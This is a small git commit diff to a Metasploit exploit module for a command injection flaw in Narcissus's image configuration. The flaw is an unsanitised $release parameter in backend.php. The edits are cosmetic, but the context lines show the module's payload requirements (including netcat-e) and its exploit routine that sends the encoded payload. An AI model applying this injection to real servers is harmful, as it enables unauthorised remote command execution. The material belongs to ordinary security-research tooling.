final cleanup

This commit is contained in:
jvazquez-r7
2012-11-20 12:52:00 +01:00
parent b002996708
commit 959ea1f0c5
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => "Narcissus Image Configuration Passthru Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Narcissus' image configuration
This module exploits a vulnerability found in Narcissus image configuration
function. This is due to the backend.php file not handling the $release parameter
properly, and then passes it on to the configure_image() function. In this
function, the $release parameter can be used to inject system commands for
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash netcat-e'
},
},
'Targets' =>
[
['Narcissus', {}]
@@ -104,7 +104,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("#{peer} - Sending malicious request...")
remote_exe(payload.encoded)
handler
end